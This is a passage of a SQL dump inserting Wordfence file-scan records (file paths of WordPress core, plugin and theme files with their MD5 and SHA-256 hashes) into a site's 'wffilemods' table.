(0xa8b8bbf4e18987f61aa567449c3a94a8, 'wp-content/plugins/Ultimate_VC_Addons/admin/vc_extend/js/vc-headings-param.js', 0, 0x191431655763a7efedd5297d68a0aad4, 0x191431655763a7efedd5297d68a0aad4, 0x322d679d94682ef843f211ab57084bf5bbed5b9918e9b078cb0c226c863f7c52, '', 0, '?'),
(0xa8bd7cd607621b6e1c39603ee88289e0, 'wp-content/plugins/revslider/admin/assets/images/sliderpresets/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xa8d5b66379dbadf5d018860f4ff57241, 'wp-content/themes/Impreza-child/functions.php', 0, 0xcd6ede01335fe8975c48480a044d55e7, 0xcd6ede01335fe8975c48480a044d55e7, 0x4bdc77196aa24930d7fa80feed97e485b9e813e5fb74b5e0d373481b9448cf0b, '', 0, '?'),
(0xa8db09cc2229a522b5e83049a36fa8c7, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php', 1, 0x00000000000000000000000000000000, 0x19ad7a84bf711a7398be713737360bf3, 0x43ae44ad619624eab93d9b665b51a734c24a57d1376c29ae2e0ede3d25afff1b, '', 0, '?'),
(0xa8e59ff68e829597118926c5bb9f280e, 'wp-admin/js/widgets/custom-html-widgets.js', 1, 0x00000000000000000000000000000000, 0x0c079b9a73b9cfc434e2188b5b9a2ce8, 0x886a4e8dd9b8eea087e0fd5346734a2af031841190871b3149ea11643b3a280a, '', 0, '?'),
(0xa905effa7e2bd8711dea58bedb1d2260, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php', 1, 0x00000000000000000000000000000000, 0xc16f6151a1a4ec7c100367e23426cfd9, 0x1bb663c255a95884fdd4f12b895d1d577664de3df82ce315bd92845a30295cb3, '', 0, '?'),
(0xa90c05988ef3da3e3922bdbe26db2da4, 'wp-content/themes/Impreza/framework/functions/comments.php', 0, 0x7b4cd0d073909e1ece7c6eebc88d0880, 0x7b4cd0d073909e1ece7c6eebc88d0880, 0xcc1ffec10a9e18c111959a37a116d7a5a54f15390f9c52232a47d701f0b90023, '', 0, '?'),
(0xa972ef5b0b2817302ca79f9738f92d0f, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/preview.tpl.php', 0, 0xab06171c2edb1208690c9989c4334343, 0xab06171c2edb1208690c9989c4334343, 0x007bd7d27365ef745f1373598bb21bf21f084f916fd40f82e754697da53ba90c, '', 0, '?'),
(0xa98f89c0d79f7a09091c3d5a0bf91179, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/paper-plane.svg', 0, 0x1f1a4df8ed5a48e6b4df284a6ac4dbe9, 0x1f1a4df8ed5a48e6b4df284a6ac4dbe9, 0xb37f4a535eefa4a86a9535f38a778916b7a83bc123172d2d1380e4b21f1e9710, '', 0, '?'),
(0xa998a069db5d2e684e421bc47452d836, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flash_off_24px.svg', 0, 0x4b3878fd21c679ec608ba50e41edc9d7, 0x4b3878fd21c679ec608ba50e41edc9d7, 0x2671550700cb4ef02f5100cf21ccce49a4b38fe793f2a4c42791b9c1fbb7424c, '', 0, '?'),
(0xa9a21c3d43d1a0d4e62a5458f4b9b434, 'wp-admin/css/colors/_variables.scss', 1, 0x00000000000000000000000000000000, 0x7cc967183c11b5c46e0cb2a83132fe9a, 0x158b57eb7ee5208e26a378649659e26279e315c558b529ec59ab4adb316195c1, '', 0, '?'),
(0xa9a239529c2c3537aabed686838e5b85, 'wp-content/themes/Impreza/framework/templates/blog/single-post-related.php', 0, 0x19209c623ae545fb94c1a9fe6a544a84, 0x19209c623ae545fb94c1a9fe6a544a84, 0xb1b04a604516c71dff31489eba27b1fe38eedc141745dfe138aeb730264b8845, '', 0, '?'),
(0xa9cadab774ec67975a1d180fb76745f2, 'wp-includes/class-wp-http-response.php', 1, 0x00000000000000000000000000000000, 0xb50b17dd0234be8379db4bfd84f8df95, 0xe7ce9909e1e5f95bf3867b004966e20084748de2760a3964b99590f8788ae79d, '', 0, '?'),
(0xa9d818b1f05e7b38b83d1c2b495444ce, 'wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-accordion.php', 0, 0xaccca7334562e6cbee9d794e374a7f43, 0xaccca7334562e6cbee9d794e374a7f43, 0x7fa16ba85eb8607f8d0ee9c2d414cc9f930e4887e33bd290dc936b814eef0d17, '', 0, '?'),
(0xa9dc201dcd011fe71849743133052619, 'wp-admin/js/nav-menu.js', 1, 0x00000000000000000000000000000000, 0x32237fd4dbc69f6bbf3b7f7496cc674f, 0x21d732381bbdd6de8e0be0c4861bc2a268b54b636a622baa62d89246511658bf, '', 0, '?'),
(0xaa0f10b9cf47996cf6dccadda0055fd6, 'wp-includes/js/dist/date.js', 1, 0x00000000000000000000000000000000, 0xc3c7d67bf8ad5e0c9ea514bb97cd5e1a, 0x8d83ba222ace2bbe7fd339d14b67b9e217a63cfff7f007ed1b21c8003ad611a2, '', 0, '?'),
(0xaa1e4a2de78b81bad45c22fdd7a526f0, 'wp-includes/sodium_compat/src/Core/Util.php', 1, 0x00000000000000000000000000000000, 0x7e585a65264f61b888fb67b58b41f063, 0xb10b9341a4149a446739270896f8f118e563ab8698c09a243fd9b543abcdec2f, '', 0, '?'),
(0xaa2298b8da5096e504cd6eb1432e86e3, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_devices_other_24px.svg', 0, 0xb5663f12206175609b7bbdf1849873be, 0xb5663f12206175609b7bbdf1849873be, 0x3f52b4d012e3d46ca77f46fd4ef9ebe0ccd4c94e90a6083bfd63461240bd26e4, '', 0, '?'),
(0xaa3aec43af3ebb26c0af0d381300690d, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-time.svg', 0, 0x89e2a8ea39d0e57b022d18fe9de09508, 0x89e2a8ea39d0e57b022d18fe9de09508, 0x211331d6b8eede7ef03e672088c65c087f80b40fa2311a04b179a4a90b2bd1b9, '', 0, '?'),
(0xaa3b133f32e8e18853fde3a700fb9a70, 'wp-admin/customize.php', 1, 0x00000000000000000000000000000000, 0x43164b1befd6dd6241069000eb463553, 0xa1a0ed041d89af105efef3afdd809a171ddbab235bafb15636c58c1771a3ed37, '', 0, '?'),
(0xaa3c72250026dae2e2ea98afe1a0abc8, 'wp-content/plugins/js_composer/assets/lib/bower/progress-circle/ProgressCircle.min.js', 0, 0x79ade677e07db2d5ed5bbe159c3de13d, 0x79ade677e07db2d5ed5bbe159c3de13d, 0x120d1b146a64c5fecdc4b8bb077eea02b39370c66b5575d4614968ce5613e98c, '', 0, '?'),
(0xaa496d98afa5283c70dafea333520b81, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-pie-chart.svg', 0, 0x96f8d0a1facdb65526f896b40d2d88f4, 0x96f8d0a1facdb65526f896b40d2d88f4, 0x854b1b626511999a5eb9bff2ed3a8a7809946e94a2ee1fa9ef806744c2dabd24, '', 0, '?'),
(0xaa53377bab26bbd3fbcfb3561cc6f351, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-battery.svg', 0, 0x15bc452203c2c41ec7bb94ace223d86b, 0x15bc452203c2c41ec7bb94ace223d86b, 0x6755efb2510e509aac5c96add0feecfc3008127793f68c01bfcaaa069a7e3892, '', 0, '?'),
(0xaa5477c3109deacd940a34c393d73086, 'wp-content/plugins/revslider/public/revslider-front.class.php', 0, 0x32410673bb86013f10374bee7d4a9043, 0x32410673bb86013f10374bee7d4a9043, 0x685d667f34024717e996d963b96e6d47dff41eeb5c961f1447bc80f19128d3a2, '', 0, '?'),
(0xaa550b886b1885ece747a0e9deb4ba89, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_bottom_24px.svg', 0, 0x85f8993817a993e285bc654526cbe84f, 0x85f8993817a993e285bc654526cbe84f, 0x4291fe29b42e866e44456c052a939bc6f7599ee5aa69c02d1e53c21ee01220f3, '', 0, '?'),
(0xaa58e0e1401bc1d425bd310c4384c169, 'wp-content/plugins/wordfence/images/lightbox-controls.png', 1, 0x00000000000000000000000000000000, 0x9d6d135dbc6192ac0e955c24c9048f1f, 0xc7970892683fe0efef0653e9eecd29b83a9bc1d6694002682e90a058d7679486, '', 0, '?'),
(0xaa5c721839d8e2e69e5016293a53b0fa, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_grid.php', 0, 0x434ae807aefd0946ab76f4e0006b746d, 0x434ae807aefd0946ab76f4e0006b746d, 0x1067da8eeed764354787354b9b52db5358ca8ce3a248cbec7267d4c4477d75c5, '', 0, '?'),
(0xaa5d16da2ec71904310b0d5018584ca9, 'wp-admin/includes/update.php', 1, 0x00000000000000000000000000000000, 0x144fe9e4255da5db578b5f79f80c9b65, 0x4778ac5dd3e33b1659b0775439cf8187abe5d9f61fa0fcfb06a0b733e911ff58, '', 0, '?'),
(0xaa6a62a92b43157a134ff5565b9a6b46, 'wp-content/plugins/js_composer/assets/css/lib/vc-open-iconic/fonts/vc_openiconic.svg', 0, 0x479f66f1a4ada7ba94ead86d924e8394, 0x479f66f1a4ada7ba94ead86d924e8394, 0xb3ed216e7e1a9aaf903e9f5a785e0861fcd1e4829aed82ac7ab016a6bb2a98cc, '', 0, '?'),
(0xaa6a708864aa72f81b86193e3d451aa8, 'wp-content/plugins/js_composer/config/social/shortcode-vc-tweetmeme.php', 0, 0xcb3f466a747ae7b43f3d8b14f2042ef1, 0xcb3f466a747ae7b43f3d8b14f2042ef1, 0x16bce9c0e62e7579d2f0e9d77294f7b755cdb1f5f283aae9363a8a4dfdc62ada, '', 0, '?'),
(0xaa6bb4f348b9a9c35b1d6cbbff667a2c, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_horizontal_24px.svg', 0, 0xf51e47881fb5384647109d7b97932809, 0xf51e47881fb5384647109d7b97932809, 0xb3212e5475f123c6e8d7bfde6d7e004458cfae05d46dec5e230c3541b02aee72, '', 0, '?'),
(0xaa721b59fdff00ad53b297c4287a7cab, 'wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php', 1, 0x00000000000000000000000000000000, 0x2d47620793796680d47cf5bd5381bc92, 0xd96f8ca447357d105bef60c66e86fa78b5a4c2dca15e8b404223ccd7f59e6c62, '', 0, '?'),
(0xaa75241d8a7bc2e3db15dca893a776e5, 'wp-includes/blocks/latest-comments.php', 1, 0x00000000000000000000000000000000, 0xb0127ed074c5979e204c9d9090a4e54f, 0x4118d11c7da040de58c2f0e676feb0d0deaac93efb5fb336f03883cd2f11353c, '', 0, '?'),
(0xaa7e134b950cc981b71c777766c043ec, 'wp-admin/js/widgets/media-gallery-widget.js', 1, 0x00000000000000000000000000000000, 0x90ec0828c40b94a8e5f3eea5ce423fec, 0x8ed06ec0143273e386bdd943ce6f1439dfb22999e0243e93b49b96b2eb3a2123, '', 0, '?'),
(0xaa8558ba6329ac0ac2f9acc47dac202b, 'wp-content/themes/Impreza/framework/config/cform.php', 0, 0x4f78b95d63cdcc9cb3928e3d557ea0dc, 0x4f78b95d63cdcc9cb3928e3d557ea0dc, 0x3d4d3c4230c618f0f95192a29d895517082767b2ab929235ee1fd0fd44a8369d, '', 0, '?'),
(0xaa87ddd4f0dc8d063c93f0ec27d38ca4, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_add_location_24px.svg', 0, 0x00d260af157f3e380a388b1917aac71d, 0x00d260af157f3e380a388b1917aac71d, 0x85788a3131268505325e13902aa74a2fe36340176685af4b7e3c2e075b5fa32c, '', 0, '?'),
(0xaa887d7ab29aee81a423b88099821e1a, 'wp-includes/Requests/IRI.php', 1, 0x00000000000000000000000000000000, 0x183508325d839c7bf27db5f909600e58, 0xc9493f037eca34f7bb01df5d34affbc710879f074b82ad46aafd2276ab49281d, '', 0, '?'),
(0xaa9e3491798733256bb32091b398d11f, 'wp-admin/js/widgets/media-image-widget.js', 1, 0x00000000000000000000000000000000, 0x082c8d564caa265aa7aaaad422a4acee, 0x5a9b74554fa4bab2b5d4764bf0d078f2be4f415f56da784921b389924091666c, '', 0, '?'),
(0xaaa06e00cddc312097cdc80af8400ea8, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_confirmation_number_24px.svg', 0, 0x0fb9dc84b10eeb921f34bd5c741cad5f, 0x0fb9dc84b10eeb921f34bd5c741cad5f, 0xfe2aac292cc52409f34f2a3e1f7030c037188967e519a3278afb9a51e236005a, '', 0, '?'),
(0xaaa093a2619936b27a0a5e83d561c7ff, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_bar_24px.svg', 0, 0x43482d9e5df685cb0ef380bb56124852, 0x43482d9e5df685cb0ef380bb56124852, 0xa6cba25a24ede4097b1d1382c5dee274af6d39877d8ad1fa849830cc0daaf7ad, '', 0, '?'),
(0xaaaaf5d914860c987c860120b20fbd19, 'wp-includes/js/masonry.min.js', 1, 0x00000000000000000000000000000000, 0xc54e75edf5cbaf412bc16ba4145f6032, 0x27b4d105cf44bf1d160de3ca3cc4a99aeef203e468c0823dde74f497fc2997c2, '', 0, '?'),
(0xaabf92779004897e49760bba582517c4, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_24px.svg', 0, 0x0d646d2b18cb3e5f984d4eb49e744054, 0x0d646d2b18cb3e5f984d4eb49e744054, 0x58ba0109d9d5e48ad8449fbf4384c7cf1f3701eb5ea93d8697db431e050b0650, '', 0, '?'),
(0xaacbd9767b43abc0baced2a7808e3449, 'wp-content/plugins/wordfence/lib/wfViewResult.php', 1, 0x00000000000000000000000000000000, 0x1cd939c2d6bf59434134147ce0b81870, 0x7b3330fd7044bcf6722523c3c14d7acf5f90e2cf944b7d9f416f364df88a52f6, '', 0, '?'),
(0xaacfd11dd30e496a522730a51f7594c3, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart-pyramid.svg', 0, 0x5a10c737f8712e349995c955578ad9e4, 0x5a10c737f8712e349995c955578ad9e4, 0x3969782c7aa9b9a7b9a4ceace438757ea92936fdc2dd94b40ca04d0429256cf6, '', 0, '?'),
(0xaada70ba245e8186f48db5649d125a05, 'wp-admin/network/plugin-install.php', 1, 0x00000000000000000000000000000000, 0xd9d1d30addb0da61f1c085059db0fd18, 0x0b136ff37abd23e70b8dfcc9e41ba89c272c841d59c38a349237ad5cd822febc, '', 0, '?'),
(0xaae65b4bbaeee6628ec4da320c3810b7, 'wp-includes/pomo/po.php', 1, 0x00000000000000000000000000000000, 0x6e725fc91368894f82b9415dcfffb70a, 0xb5c726b278e2fc5fc760fa4456a8b7aeb7bcbed3da218942064d7ec1bfad22c1, '', 0, '?'),
(0xab092d354ac9d606c6ee6474c9550f9f, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_security_24px.svg', 0, 0xe175fd5258280d7afa3b080893222fc5, 0xe175fd5258280d7afa3b080893222fc5, 0xe1989038c84e2d0e88b9c4987ed557211d6fad0a58570701322e2cdc93a201b8, '', 0, '?'),
(0xab11277af1259b2a5b9b4bdde06bb511, 'wp-content/plugins/js_composer/config/containers/shortcode-vc-row.php', 0, 0x0005ca75920c8d7613efec90c94c16db, 0x0005ca75920c8d7613efec90c94c16db, 0xc884fe94e3d1f824766a268aad59a39c5271d113e95c585618fc3976ae79a8ad, '', 0, '?'),
(0xab11f9f66a9a5bf9cdab6246fab606ef, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure02.svg', 0, 0xaa1ba8ab786043739557b8d16abd1bed, 0xaa1ba8ab786043739557b8d16abd1bed, 0x1ae452d3a7bfc8ed3e632e9c8356a80068a5b25716c7555f0a8dd009c616765b, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0xab17d0e8125890920fb0d8024aa0fc70, 'wp-content/plugins/wordfence/lib/wfBrowscapCache.php', 1, 0x00000000000000000000000000000000, 0x115408c190ebcf51d7780f14876a8219, 0x15d00883ae9eeb1d3159849d84f5549a8ad088d571f3a45736dd8b998fd56809, '', 0, '?'),
(0xab27ed2333303852a31b558711af54cd, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_part.tpl.php', 0, 0x9de0bacfbd62afd72d3d23390c1c4eaa, 0x9de0bacfbd62afd72d3d23390c1c4eaa, 0x5ad7caef11339be0ab887738283f1f692e01a76b0b778f5a194b2111ef937116, '', 0, '?'),
(0xab303f9cd158a33819149b116f1ee81b, 'wp-content/plugins/js_composer/config/structure/shortcode-vc-widget-sidebar.php', 0, 0x161c49ef3bf4b605a18795a7f296d34f, 0x161c49ef3bf4b605a18795a7f296d34f, 0x702817a2710dfa0a2d4a5d0d0094d09eead2ad5bea725c57c60dd116d1e1fbb6, '', 0, '?'),
(0xab488194ae6f435cb8f6892ffc5bff87, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_1_24px.svg', 0, 0x9ef3a60214e0f2fcf899f800a8fb373e, 0x9ef3a60214e0f2fcf899f800a8fb373e, 0x3442e659b1138d4e9f34be73e161b22da031a14e67355a76fbcb1862a04f304d, '', 0, '?'),
(0xab53c4ebfa8fb371ea608e83904ddc07, 'wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php', 1, 0x00000000000000000000000000000000, 0x791be02293e4c537db908a801790b4c6, 0xa94c645eb1fc50c6b55e678bf0e7f42fe1114643d445e0b4ba724cd32971d848, '', 0, '?'),
(0xab58debdfbd5d94170e9531e81454c08, 'wp-content/maintenance/template.phtml', 0, 0x16f486fa1aa3a0955a62832dedb90566, 0x16f486fa1aa3a0955a62832dedb90566, 0xf97d8ab7054aae1cf9a32b06359fe1070754e98788738318aae5631b015e9e13, '', 0, '?'),
(0xab5d4db093727ad1578b3991e79c1334, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/buildings.svg', 0, 0x34fb92c740d7892931dac68b037452ba, 0x34fb92c740d7892931dac68b037452ba, 0xdb36e9d3a3e8f206179365fdc4d47fee44b7dc427ab7b852c4c2b50e8f73e3d0, '', 0, '?'),
(0xab64582473840ad47faae677ab5dabaa, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-templates.tpl.php', 0, 0x3a7acebd856a536abed7edfb69bf4962, 0x3a7acebd856a536abed7edfb69bf4962, 0xdad8b4883f27028c0746d4e9666f6fd672ca0ecf7e31fc279f0c530f115629f4, '', 0, '?'),
(0xab6ed6a2a1f90d920b563591198b2cd9, 'wp-includes/widgets/class-wp-widget-meta.php', 1, 0x00000000000000000000000000000000, 0xd638f210c84cafa9cab52658b98a875b, 0xaca630be770a55251834583ca0a7eb289b17907d7b347cb03e9c9d495ef56cd4, '', 0, '?'),
(0xab6fa2f9a0b46c3ebce2787e49b020c2, 'wp-admin/network/about.php', 1, 0x00000000000000000000000000000000, 0x36fd6671a5493cc8c5405621d96dea7c, 0x60f2a4e97f2c4d02f61e5bfe8ee3629c18f4bceb2609a054256ddf550cb66558, '', 0, '?'),
(0xab88790c573d86e2854487717de7cad6, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_single_image.php', 0, 0x24ca71953a2c0dbff5164bb489244c44, 0x24ca71953a2c0dbff5164bb489244c44, 0xa7b36fb92f075e651a27c0c7b7d0655fe196ee2dad883040401527d41196587b, '', 0, '?'),
(0xab8886900e3e439d4b112401c07a3962, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows01.svg', 0, 0x49d4ed20088e88c3ce295aaa665c6e87, 0x49d4ed20088e88c3ce295aaa665c6e87, 0xcd56e7ac7bab548b72a4952a2b6faa9d5e8ec8e029a24a7b72bdf757945927b8, '', 0, '?'),
(0xab88b030116a886cb5530713d3fd4bf2, 'wp-includes/post.php', 1, 0x00000000000000000000000000000000, 0xa74c250da90cfb0f7104830d607dc368, 0xaa1ae1147b4a0de8559931ef8f25ea0ccbab71c032434dc0ba7b8f9f047c05eb, '', 0, '?'),
(0xab8b83e35eda54dfe73511d3e66a2da1, 'wp-content/plugins/revslider/admin/views/slide-overview.php', 0, 0x99ff6dba42fd3dbbc0221f4400b50e19, 0x99ff6dba42fd3dbbc0221f4400b50e19, 0xda7ba71edec478ac8d950921e04288bbeb0bdcdd61a0b49ffe81014ea0582ed4, '', 0, '?'),
(0xab94839295678a9166e7975fa1437dfe, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/class-vc-acf-shortcode.php', 0, 0x834ef0b365f9e440b5b88e27fd6f2814, 0x834ef0b365f9e440b5b88e27fd6f2814, 0x58fdbb1f502eccdb19f826b7b0f4f40857e423055d4e2a25b942e3cff2dd20ae, '', 0, '?'),
(0xab98b8f718de90b871e36963bc063d92, 'wp-includes/class-wp-simplepie-file.php', 1, 0x00000000000000000000000000000000, 0x93feb0d909684c244b9b933a677180fa, 0xfaa201db67c63b2df1970eb792d803613cc99024bc15277497f16ffef23dffb3, '', 0, '?'),
(0xab9c2c4cea716d5cc06a58232e73ffce, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_accordion.php', 0, 0xd5714b63783a6082c2ffec85dee6b631, 0xd5714b63783a6082c2ffec85dee6b631, 0x390f1f9c00a760cc2facda36f0972eac1ff9587e2f74c397eb27b93347e38df0, '', 0, '?'),
(0xabb31d73f9d58c51b1b6376fe9c304f4, 'wp-content/plugins/wordfence/views/common/status-detail.php', 1, 0x00000000000000000000000000000000, 0xa6d1bf44ca00bb7cf69510b2f173e657, 0xbc0a2a0cae150e76af5192f72847d5f369d475e03340d7ce34ff8a2a8f870fc9, '', 0, '?'),
(0xabc0d3372e3f3e03fe9046bc0496323b, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-meeting02.svg', 0, 0xab05b37fb6afa16e093bbf71c061a1cf, 0xab05b37fb6afa16e093bbf71c061a1cf, 0x584317e2a04abaacb57cb411600b5d9e9a307957304a0e3568ecf278521f2c7e, '', 0, '?'),
(0xabc2abace4972d6a3db475b64e5c7127, 'wp-admin/css/farbtastic.css', 1, 0x00000000000000000000000000000000, 0xf9e33829b8faed7d7bbef843fb683255, 0x7c41b9e54ce4bac94d62c778a60e64013858ef82156a582ed0fb8cd65e0a1a8e, '', 0, '?'),
(0xabf4f7e1978fd81033852d831bab34b0, 'wp-admin/css/colors/midnight/colors-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x73b50e985b5ddbe2afdf3e60fe3c91e9, 0xcb530bb80bb983ec9e3d45fd47823aeec79dca20deab85dfb23b588c5fb6f506, '', 0, '?'),
(0xac22da954b5b408947c70cfbe1e13991, 'wp-admin/includes/class-wp-theme-install-list-table.php', 1, 0x00000000000000000000000000000000, 0x09b186bc695874c895c4b57477506a1c, 0x27aa85c4d11dee1ef88af58f58942410e98e59b8f73180897d7bf0ddf4b0be97, '', 0, '?'),
(0xac23eee47530ac63a1178c827db28087, 'wp-includes/js/dist/i18n.js', 1, 0x00000000000000000000000000000000, 0x88e1c5f8e0b6388d6f3c562c61523029, 0xf0d9894417070f5b245d1dba4882e4a0cc0d2190647c763d481f6cce05401ce7, '', 0, '?'),
(0xac24b451b27350b8acea52337d18072f, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php', 1, 0x00000000000000000000000000000000, 0xb43e4e2ea252f279a345824588986ea6, 0x3051a79c0eea7e3094ccf6536267f4738699783a9c4520c76df079f85c4f13f4, '', 0, '?'),
(0xac3321390b16e43de8369d0c12dda10f, 'wp-admin/images/resize-rtl-2x.gif', 1, 0x00000000000000000000000000000000, 0xcf154dd5ef93f9a84df148f521fe5941, 0xa332f9ec6dd16fdfe67b0eab7c856e7989fccb839f340b28e5f8fbcf86ee3daa, '', 0, '?'),
(0xac496f6fa8d486356e75a4d1adb68848, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE', 1, 0x00000000000000000000000000000000, 0x02c9c94b41a1e8638cbca074f88626f7, 0xba3b3825032668c431a9b01f52df6ede4a206790302d977022cd46312a748273, '', 0, '?'),
(0xac51fc1c36cc4235158f723fac162239, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_video.php', 0, 0xef49be91ec40fa570659a1b4e5b0fed2, 0xef49be91ec40fa570659a1b4e5b0fed2, 0x8250bed2434fb9518ea78410e6b72bcbb1026131d30eb2faef7b863e956a102d, '', 0, '?'),
(0xac5a67d355693169e7c6bee478c83df5, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php', 1, 0x00000000000000000000000000000000, 0xa664ef571be82c82fa584545e66ff1fb, 0x6c3ff599e0a914290f2626a9a4e2e2e61ed350c8d3501e24401f13da5cb92fa0, '', 0, '?'),
(0xac5e325ea3549a9d3ac86d4a87f83aad, 'wp-content/plugins/wordfence/lib/IPTrafList.php', 1, 0x00000000000000000000000000000000, 0xcfdb3c340ea70c7777dcfbd55a25d541, 0x7e8c0e1f0a8e299bc05e8aaf0aa5323010b92a2224893bdce85ada6d4f9de363, '', 0, '?'),
(0xac5e8941ed3d768b56e7e31ac7f38bd5, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_exit_36px.svg', 0, 0x4c11a286b9f01c3a1297ae4626b4671b, 0x4c11a286b9f01c3a1297ae4626b4671b, 0x39b82853becf6ac5f91b428d0e9bbd5bfbfb817352ecb28d5c1ab8ed21b19c6b, '', 0, '?'),
(0xac62f33013dd803e6ae3a40222abfe47, 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png', 1, 0x00000000000000000000000000000000, 0x41612b0f4a034424f8321c9f824a94da, 0xac2f233f54ef8669054f4c7976a6ed751b9a98544b94b0a9c9a4bdb75cd8bbf5, '', 0, '?'),
(0xac696992a69f0ea809dd4198e2ff510f, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/diamond.svg', 0, 0x55a917f8c5d20ac7ada3ef47f2e93984, 0x55a917f8c5d20ac7ada3ef47f2e93984, 0xdd3da23e1777ed6f7703b128929f77b8a3fadc27e4017152164ee420033ef315, '', 0, '?'),
(0xac9df4d5bb675fe64839539b3232769a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gears1.svg', 0, 0x017e6f4b59ca50e9919f2b00978ea9d6, 0x017e6f4b59ca50e9919f2b00978ea9d6, 0x559cd0ae2016cf35199f38511d8f54e582bed4ee6f27a724f22b10e63f2aca29, '', 0, '?'),
(0xacae2d225af463dc31d7263f7a6a4565, 'wp-content/plugins/js_composer/include/autoload/vc-pages/automapper.php', 0, 0x0df8689a66ff3a2452d6a0c9fec6cc93, 0x0df8689a66ff3a2452d6a0c9fec6cc93, 0xa6eb2a7d5a5845c6c5144bd50ddaed8402059560617d710bd9396bd4f463874f, '', 0, '?'),
(0xacb301ef99358bbd591053beb8791842, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_aspect_ratio_24px.svg', 0, 0xf9015e89fdde79f4e3aee0fb1c5372bc, 0xf9015e89fdde79f4e3aee0fb1c5372bc, 0xa43eb289cfedaf0605a6c8216c808bdf96e79d6c09d4d1a2deb29e04fc97253b, '', 0, '?'),
(0xacd8e8639c96c1a956739f39a16fe8ef, 'wp-includes/css/dist/editor/editor-styles-rtl.css', 1, 0x00000000000000000000000000000000, 0x8977b727a799ed3a59692b81e46302fe, 0x8049590001b9bf081bf6c2311273589109766143acbf480c86e214dedeaf39ce, '', 0, '?'),
(0xacd9db1c16464c60878a61e129935d5a, 'wp-content/plugins/js_composer/include/params/params_preset/params_preset.php', 0, 0x761fb9a21e303bc97abf6d24716a50ab, 0x761fb9a21e303bc97abf6d24716a50ab, 0x2cdcaef71d70970b16cf0dd7f53d79cdddc840f19de2a26a641d72e56c2bf962, '', 0, '?'),
(0xace1c99365cdbc7b34892e032f8c4446, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_social_links.php', 0, 0x0b49b559232b0869c1d8464aa2bbc00e, 0x0b49b559232b0869c1d8464aa2bbc00e, 0x51808251c85a1ad7c262ba993d2d2c19ffe56f0147d29613516e260685d8b64a, '', 0, '?'),
(0xacf373433c893a8386e6183c1bce41d0, 'wp-includes/sodium_compat/src/Core/SecretStream/State.php', 1, 0x00000000000000000000000000000000, 0xe9ebf5e93ac75a7be38ff0eb35b26f0f, 0x0207c1fa0cc73c10e58073e536b4f7002c095261f4ad1d756858f0e563f0d8d7, '', 0, '?'),
(0xacfc4d7c52198e8b085cd0ae63cb7685, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-settings.svg', 0, 0x33fcdfaabe72408ca72343a4cc570f14, 0x33fcdfaabe72408ca72343a4cc570f14, 0xb9e2179fd5c8405aac29de69b3be0d58fb508a15bede088b92cbce6959b72dd3, '', 0, '?'),
(0xad156d73a14ac07b202a87a57b34b4b9, 'wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-section.php', 0, 0x1d7911d3011ef6cafdf8703bcc7b0462, 0x1d7911d3011ef6cafdf8703bcc7b0462, 0x873b197080d2311a1a6eebd60a26a00764dd142dc464058cf0113fb018b17f7d, '', 0, '?'),
(0xad1fe2bab5dac9b1b8f25be3ed290c61, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_off_24px.svg', 0, 0x8313666b7d8fca4a28b1ddf1854f4b7f, 0x8313666b7d8fca4a28b1ddf1854f4b7f, 0x5c2173e3cabb9eb8f3e78ec7cd720f05fd1a56fc169ad24d25acd72fcb9927b0, '', 0, '?'),
